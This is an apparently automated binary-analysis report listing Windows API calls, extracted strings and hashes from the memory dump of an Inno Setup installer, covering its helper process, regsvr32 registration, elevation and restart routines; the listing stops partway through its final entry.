                                                            • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0062585C
                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,006CD098,00000003,00000000,00000000,00000000,00625A0B,?,00000000,40080003,00000006,00000001,00002000,00002000), ref: 006258A4
                                                            • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,006259FA,?,00000000,C0000000,00000000,006CD098,00000003,00000000,00000000,00000000,00625A0B), ref: 006258DD
                                                              • Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F
                                                            • CreateProcessW.KERNEL32 ref: 00625986
                                                            • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 006259BC
                                                            • CloseHandle.KERNEL32(000000FF,00625A01,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 006259F4
                                                              • Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                            • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                            • API String ID: 770386003-3271284199
                                                            • Opcode ID: 05f0d23c42287ecae2e57217e457ed2ec46126e3f6ae7872c277f0bd952ed0eb
                                                            • Instruction ID: 34d3d620ae4a6a58b4d890a55742d975a8112a0372845dc610fa96f79e58b5cb
                                                            • Opcode Fuzzy Hash: 05f0d23c42287ecae2e57217e457ed2ec46126e3f6ae7872c277f0bd952ed0eb
                                                            • Instruction Fuzzy Hash: 21717F70E407589EDB20EFB9DC46B9EBBB6EF09304F1041A9F509EB282D77499408F65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 006A5F04: GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F30
                                                              • Part of subcall function 006A5F04: GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F49
                                                              • Part of subcall function 006A5F04: CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F73
                                                              • Part of subcall function 006A5F04: CloseHandle.KERNEL32(00000000), ref: 006A5F91
                                                              • Part of subcall function 006A6014: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,006A60A5,?,00000097,00000000,?,006A611F,00000000,006A6237,?,?,00000001), ref: 006A6043
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 006A616F
                                                            • GetLastError.KERNEL32(00000000,006A6237,?,?,00000001), ref: 006A6178
                                                            • MsgWaitForMultipleObjects.USER32 ref: 006A61C5
                                                            • GetExitCodeProcess.KERNEL32 ref: 006A61EB
                                                            • CloseHandle.KERNEL32(00000000,006A621C,00000000,00000000,000000FF,000004FF,00000000,006A6215,?,00000000,006A6237,?,?,00000001), ref: 006A620F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Handle$CloseFile$AttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcessShellWait
                                                            • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                            • API String ID: 254331816-221126205
                                                            • Opcode ID: c2adbbc871acc4843ce61d2285dfbb2c69ebc7a97822930896cce5b608feca68
                                                            • Instruction ID: 3b593d6e4f6188ec2893085c4d8bc70e2010c955c7988aee54b7ca20d83eebf0
                                                            • Opcode Fuzzy Hash: c2adbbc871acc4843ce61d2285dfbb2c69ebc7a97822930896cce5b608feca68
                                                            • Instruction Fuzzy Hash: 4931AF70A00208AFDB10FFE9C842A9DBABAEF06314F44053DF514E62D2D7789E448F29
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,0041CF90,?,?), ref: 0040E0F1
                                                            • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040E102
                                                            • FindFirstFileW.KERNEL32(?,?,kernel32.dll,0041CF90,?,?), ref: 0040E202
                                                            • FindClose.KERNEL32(?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E214
                                                            • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E220
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E265
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                            • String ID: GetLongPathNameW$\$kernel32.dll
                                                            • API String ID: 1930782624-3908791685
                                                            • Opcode ID: 1e5aa63ad13805ebe641060d55f71927a25656d4bbeb27d65059da7d04647448
                                                            • Instruction ID: 85f15f90104044dde56611b048d4fe37091be9da2e2d426f5e1dee482ffdf80d
                                                            • Opcode Fuzzy Hash: 1e5aa63ad13805ebe641060d55f71927a25656d4bbeb27d65059da7d04647448
                                                            • Instruction Fuzzy Hash: 09418471E005189BCB10DAA6CC85ADEB3B9EF44310F1449FAD504F72C1EB789E568F89
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 0060F6E8
                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0060F6EE
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 0060F707
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0060F72E
                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0060F733
                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 0060F744
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                            • String ID: SeShutdownPrivilege
                                                            • API String ID: 107509674-3733053543
                                                            • Opcode ID: db782202178d27a3b7ec1b4d3af323313e6a5951352ddb141a95d71b7c8baf5b
                                                            • Instruction ID: 06ed2f01938c74524bf5f5b14376f39d724559be6214a1270456cb597724f4e2
                                                            • Opcode Fuzzy Hash: db782202178d27a3b7ec1b4d3af323313e6a5951352ddb141a95d71b7c8baf5b
                                                            • Instruction Fuzzy Hash: 8EF090306E430276E624AF719C47FEB218D9B40B09F50092DF644D61C1DBA9E589826B
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • IsIconic.USER32(?), ref: 006A6913
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 006A6930
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 006A6955
                                                              • Part of subcall function 005ABC0C: IsWindow.USER32(8B565300), ref: 005ABC1A
                                                              • Part of subcall function 005ABC0C: EnableWindow.USER32(8B565300,000000FF), ref: 005ABC29
                                                            • GetActiveWindow.USER32 ref: 006A6A34
                                                            • SetActiveWindow.USER32(00000005,006A6A9E,006A6AB4,?,?,000000EC,?,000000F0,00000000,006A6ACD,?,00000000,?,00000000), ref: 006A6A87
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Window$ActiveLong$EnableIconic
                                                            • String ID: `
                                                            • API String ID: 4222481217-2679148245
                                                            • Opcode ID: bbb381b8fbc4d8b387cdcd93e1fcf562f63046ab1121e3482b0235a5bbb07c6f
                                                            • Instruction ID: 936cf99dd23b6ce25ef8ab77046748165037aff960be166beb91cb3f54ae6a19
                                                            • Opcode Fuzzy Hash: bbb381b8fbc4d8b387cdcd93e1fcf562f63046ab1121e3482b0235a5bbb07c6f
                                                            • Instruction Fuzzy Hash: C3611875A002099FDB00EFA9C885A9EBBF6FB4A304F598469F914EB361D734AD41CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A,?,00000000,00000000,00000000), ref: 006B8E35
                                                            • SetFileAttributesW.KERNEL32(00000000,00000010), ref: 006B8EB8
                                                            • FindNextFileW.KERNEL32(000000FF,?,00000000,006B8EF4,?,00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A), ref: 006B8ED0
                                                            • FindClose.KERNEL32(000000FF,006B8EFB,006B8EF4,?,00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A), ref: 006B8EEE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirstNext
                                                            • String ID: isRS-$isRS-???.tmp
                                                            • API String ID: 134685335-3422211394
                                                            • Opcode ID: 3affe16ed425f9283171b1eb0e7714abad28a6a77db8245eb00c896bf4ec8b38
                                                            • Instruction ID: d39c6702953267373b2098697dd7c4daff6c19a754f4e73b98016d5d2bb0ed42
                                                            • Opcode Fuzzy Hash: 3affe16ed425f9283171b1eb0e7714abad28a6a77db8245eb00c896bf4ec8b38
                                                            • Instruction Fuzzy Hash: E6317670A006189FDB10DF65DC45ADEB7BEEB84304F5145FAE804A3291EB389E81CB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • IsIconic.USER32(?), ref: 005C90F9
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 005C9116
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 005C913B
                                                            • GetActiveWindow.USER32 ref: 005C9149
                                                            • MessageBoxW.USER32(00000000,00000000,?,000000E5), ref: 005C9176
                                                            • SetActiveWindow.USER32(00000000,005C91A4,?,000000EC,?,000000F0,?,00000000,005C91DA,?,?,00000000), ref: 005C9197
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Window$ActiveLong$IconicMessage
                                                            • String ID:
                                                            • API String ID: 1633107849-0
                                                            • Opcode ID: 8e29fb634f2bd42e54d76323cdfd72ae6654eabf5b00baf4e96ba8bdb3ccec15
                                                            • Instruction ID: 0eaebbc0e28104152e09dfddf635ce6469108de93c670a6b66e2a7222b47ea08
                                                            • Opcode Fuzzy Hash: 8e29fb634f2bd42e54d76323cdfd72ae6654eabf5b00baf4e96ba8bdb3ccec15
                                                            • Instruction Fuzzy Hash: 4F319375A04605AFDB00EFA9DD4AF9A7BF9FB89350B1544A9F400D73A1DB34AD00DB14
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetVersion.KERNEL32(00000000,0062D04E,?,00000000,00000000,?,0062D064,?,0068E013), ref: 0062CFD5
                                                            • CoCreateInstance.OLE32(006CD0C4,00000000,00000001,006CD0D4,00000000,00000000,0062D04E,?,00000000,00000000,?,0062D064,?,0068E013), ref: 0062CFFB
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CreateInstanceVersion
                                                            • String ID:
                                                            • API String ID: 1462612201-0
                                                            • Opcode ID: cbb049565a1867f24a50483da30d8e7f142d0e73d3a7e9700637a94f81e4e663
                                                            • Instruction ID: 9475dfad4fa877b1df6a840545b6a6068a8d92e7f1f871649489f85859f50de3
                                                            • Opcode Fuzzy Hash: cbb049565a1867f24a50483da30d8e7f142d0e73d3a7e9700637a94f81e4e663
                                                            • Instruction Fuzzy Hash: F511D231648A04AFEB10EF69ED4AF5A77EEEB45308F4214BAF400D7AA1C775AD10CB15
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • InitializeSecurityDescriptor.ADVAPI32(00000001,00000001), ref: 005C8B49
                                                            • SetSecurityDescriptorDacl.ADVAPI32(00000000,000000FF,00000000,00000000,00000001,00000001), ref: 005C8B59
                                                              • Part of subcall function 00413E90: CreateMutexW.KERNEL32(?,00000001,00000000,?,006B91D7,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000), ref: 00413EA6
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: DescriptorSecurity$CreateDaclInitializeMutex
                                                            • String ID:
                                                            • API String ID: 3525989157-0
                                                            • Opcode ID: 8c33769221f5c02fb9acf0c53c91398d8a51c8b1cb76e2f494f5bcae13adf59b
                                                            • Instruction ID: 330012b0c6753e8d8900aa9d7e53afb48d76169d5e03c13c529c7fe63a2e2798
                                                            • Opcode Fuzzy Hash: 8c33769221f5c02fb9acf0c53c91398d8a51c8b1cb76e2f494f5bcae13adf59b
                                                            • Instruction Fuzzy Hash: E9E092B16443006FE700DFB58C86F9B77DC9B84725F104A2EB664DB2C1E778DA48879A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ShowWindow.USER32(?,00000005,00000000,006B94FD,?,?,00000000,?,00000000,00000000,?,006B99DE,00000000,006B99E8,?,00000000), ref: 006B91BF
                                                            • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000,?,00000000,00000000), ref: 006B91E5
                                                            • MsgWaitForMultipleObjects.USER32 ref: 006B9206
                                                            • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000,?,00000000), ref: 006B921B
                                                              • Part of subcall function 005C6FB0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005C7045,?,?,?,00000001,?,0061037E,00000000,006103E9), ref: 005C6FE5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ShowWindow$FileModuleMultipleNameObjectsWait
                                                            • String ID: (\m$.lst$.msg$/REG$/REGU$<`m$Inno-Setup-RegSvr-Mutex$Setup
                                                            • API String ID: 66301061-906243933
                                                            • Opcode ID: de3423d4672b2301b2fae71c06c42d2de60b5f331c7d665ace9bfc361c3bdd10
                                                            • Instruction ID: 4d26cb6eac5053f9cdac576eea358071a92945d2d4b93ba07426bed60c59251a
                                                            • Opcode Fuzzy Hash: de3423d4672b2301b2fae71c06c42d2de60b5f331c7d665ace9bfc361c3bdd10
                                                            • Instruction Fuzzy Hash: 9B91D5B0A042059FDB10EBA4D856FEEBBF6FB49304F514469F600A7381DA79AD81CB74
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CloseHandle.KERNEL32(?), ref: 00625D4B
                                                            • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00625D67
                                                            • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00625D75
                                                            • GetExitCodeProcess.KERNEL32 ref: 00625D86
                                                            • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00625DCD
                                                            • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00625DE9
                                                            Strings
                                                            • Helper process exited., xrefs: 00625D95
                                                            • Helper process exited with failure code: 0x%x, xrefs: 00625DB3
                                                            • Helper process exited, but failed to get exit code., xrefs: 00625DBF
                                                            • Helper isn't responding; killing it., xrefs: 00625D57
                                                            • Stopping 64-bit helper process. (PID: %u), xrefs: 00625D3D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                            • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                            • API String ID: 3355656108-1243109208
                                                            • Opcode ID: c0b4aeda6ed184155dfbd483c9f69399a01c3cafee286f79e446162a0cb3cd1f
                                                            • Instruction ID: d564c8b30f574b505304bc0216fad519ef2dd9895e072bde183416e8b9fa8f35
                                                            • Opcode Fuzzy Hash: c0b4aeda6ed184155dfbd483c9f69399a01c3cafee286f79e446162a0cb3cd1f
                                                            • Instruction Fuzzy Hash: 9C21AF70604F50AAD330EB78E44578BBBE69F08310F048C2DB59BC7682D734E8808B5A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0060D3B4: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4A1
                                                              • Part of subcall function 0060D3B4: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4B1
                                                            • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,006B75FA), ref: 006B748F
                                                            • SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,006B75FA), ref: 006B74B6
                                                            • SetWindowLongW.USER32 ref: 006B74F0
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000,?,00000000), ref: 006B7525
                                                            • MsgWaitForMultipleObjects.USER32 ref: 006B7599
                                                            • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000), ref: 006B75A7
                                                              • Part of subcall function 0060D8B0: WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0060D996
                                                            • DestroyWindow.USER32(?,006B75CA,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000,?), ref: 006B75BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FileWindow$CloseHandle$AttributesCopyCreateDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                            • String ID: (\m$/SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                            • API String ID: 1779715363-1630723103
                                                            • Opcode ID: 7fedde1d07b3342257f34169e40f84480b518e12dcab26a3e4e2a454b31cf438
                                                            • Instruction ID: ef81c38150d0c0f6437f901880bd06975f11695bff6d213fe2789ed19ae6d402
                                                            • Opcode Fuzzy Hash: 7fedde1d07b3342257f34169e40f84480b518e12dcab26a3e4e2a454b31cf438
                                                            • Instruction Fuzzy Hash: EE4181B1A04208AFDB00EFB5DC56EDE7BF9EB89314F11456AF500F7291DB789A408B64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,000000FF,00000000,00000000,00000000,006261A7,?,00000000,00626202,?,?,00000000,00000000), ref: 00626021
                                                            • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,0062613C,?,00000000,000000FF,00000000,00000000,00000000,006261A7), ref: 0062607E
                                                            • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,0062613C,?,00000000,000000FF,00000000,00000000,00000000,006261A7), ref: 0062608B
                                                            • MsgWaitForMultipleObjects.USER32 ref: 006260D7
                                                            • GetOverlappedResult.KERNEL32(?,?,00000000,000000FF,00626115,00000000,00000000), ref: 00626101
                                                            • GetLastError.KERNEL32(?,?,00000000,000000FF,00626115,00000000,00000000), ref: 00626108
                                                              • Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                            • String ID: CreateEvent$TransactNamedPipe
                                                            • API String ID: 2182916169-3012584893
                                                            • Opcode ID: acb36331ee21d08b7d289947a02b8ab598f29c5b04c1412d9fc7a2506ad31a00
                                                            • Instruction ID: 6106728f610c95dcbec9252819f2c5c1e9fccb50d9899b4423df3e52f48f78ac
                                                            • Opcode Fuzzy Hash: acb36331ee21d08b7d289947a02b8ab598f29c5b04c1412d9fc7a2506ad31a00
                                                            • Instruction Fuzzy Hash: 6441AC70A00618EFDB05DF99DD85EDEBBBAEB08310F1041A9F904E7392D674AE50CB24
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000,00000000), ref: 0040DFAE
                                                            • LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000), ref: 0040DFD2
                                                            • LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000), ref: 0040DFE1
                                                            • IsValidLocale.KERNEL32(00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040DFF3
                                                            • EnterCriticalSection.KERNEL32(006D1C14,00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040E050
                                                            • LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040E079
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                            • String ID: en-US,en,
                                                            • API String ID: 975949045-3579323720
                                                            • Opcode ID: 171b762d311100d548245b05869de6cc58e31fb58a3f3531ab4430e822a5ac23
                                                            • Instruction ID: 7d1429daecdd90a797f7fba0e37e49eac4d41b909b59f49409e6443efac98480
                                                            • Opcode Fuzzy Hash: 171b762d311100d548245b05869de6cc58e31fb58a3f3531ab4430e822a5ac23
                                                            • Instruction Fuzzy Hash: F7218A60B90614A6DB10B7B78C0265A3245DB46708F51487BB540BF3C7CAFD8D558AAF
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C801B
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            • RegCloseKey.ADVAPI32(00000001,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C806E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AddressCloseHandleModuleProc
                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                            • API String ID: 4190037839-2401316094
                                                            • Opcode ID: 9ecea8ea030eead22ebc029c49188dd1b7d15adc30014d18dbe4d38bf6596737
                                                            • Instruction ID: b59d3067a1cffae51886ca0dc1f1740e66d40653876fb7099798d5cffc045aa9
                                                            • Opcode Fuzzy Hash: 9ecea8ea030eead22ebc029c49188dd1b7d15adc30014d18dbe4d38bf6596737
                                                            • Instruction Fuzzy Hash: 51214F34A04209AFDB10EAE5CC5AFFE7BE9FB48704F60486DA500F3681EE74AA45C755
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F
                                                            • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00624D58,00000000, /s ",006D579C,regsvr32.exe",?,00624D58), ref: 00624CC6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CloseDirectoryHandleSystem
                                                            • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                            • API String ID: 2051275411-1862435767
                                                            • Opcode ID: 1bea974fa6696359a357cec99c828a5227b29a5a15a1c42e55022760e2430c78
                                                            • Instruction ID: 4609d961d1e6a6c9b50d20a9c17260b7e2f4bf46ee5c2bafd069b1c5a14d41a0
                                                            • Opcode Fuzzy Hash: 1bea974fa6696359a357cec99c828a5227b29a5a15a1c42e55022760e2430c78
                                                            • Instruction Fuzzy Hash: 0B413F30A0061CABDB10EFE5D892ACDBBBAFF48304F51457EA504B7282DB746A05CF59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 004062EE
                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 004062F4
                                                            • GetStdHandle.KERNEL32(000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406313
                                                            • WriteFile.KERNEL32(00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406319
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 00406330
                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 00406336
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FileHandleWrite
                                                            • String ID: <T@
                                                            • API String ID: 3320372497-2050694182
                                                            • Opcode ID: 3a7656cd0c19575780d7894bf4f285e5ac945aaff44c80ad8d028cd78a591cb3
                                                            • Instruction ID: ee5667e1a227ecbea5375e2fa2ea65b47cf69c4a4a195d8f09788a9c4629ec5a
                                                            • Opcode Fuzzy Hash: 3a7656cd0c19575780d7894bf4f285e5ac945aaff44c80ad8d028cd78a591cb3
                                                            • Instruction Fuzzy Hash: 5701A9A16046147DE610F3BA9C4AF6B279CCB0976CF10463B7514F61D2C97C9C548B7E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • Sleep.KERNEL32(00000000,?,?,00000000,0040F300,0040F366,?,00000000,?,?,0040F689,00000000,?,00000000,0040FB8A,00000000), ref: 00405E1E
                                                            • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040F300,0040F366,?,00000000,?,?,0040F689,00000000,?,00000000,0040FB8A), ref: 00405E38
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: d1f42db9d12138cdecdca87d68e48a81541cc59cd0f269c0ee0c41ffaf02f020
                                                            • Instruction ID: 71ad01a6e0dc675f4130d8d0918bf11407b14d9ec69c5e02b41b8aae26145368
                                                            • Opcode Fuzzy Hash: d1f42db9d12138cdecdca87d68e48a81541cc59cd0f269c0ee0c41ffaf02f020
                                                            • Instruction Fuzzy Hash: 2871C031604A008FD715DB69C989B27BBD5EF85314F18C17FE888AB3D2D6B88941CF99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetCapture.USER32 ref: 005B83B6
                                                            • IsWindowUnicode.USER32(00000000), ref: 005B83F9
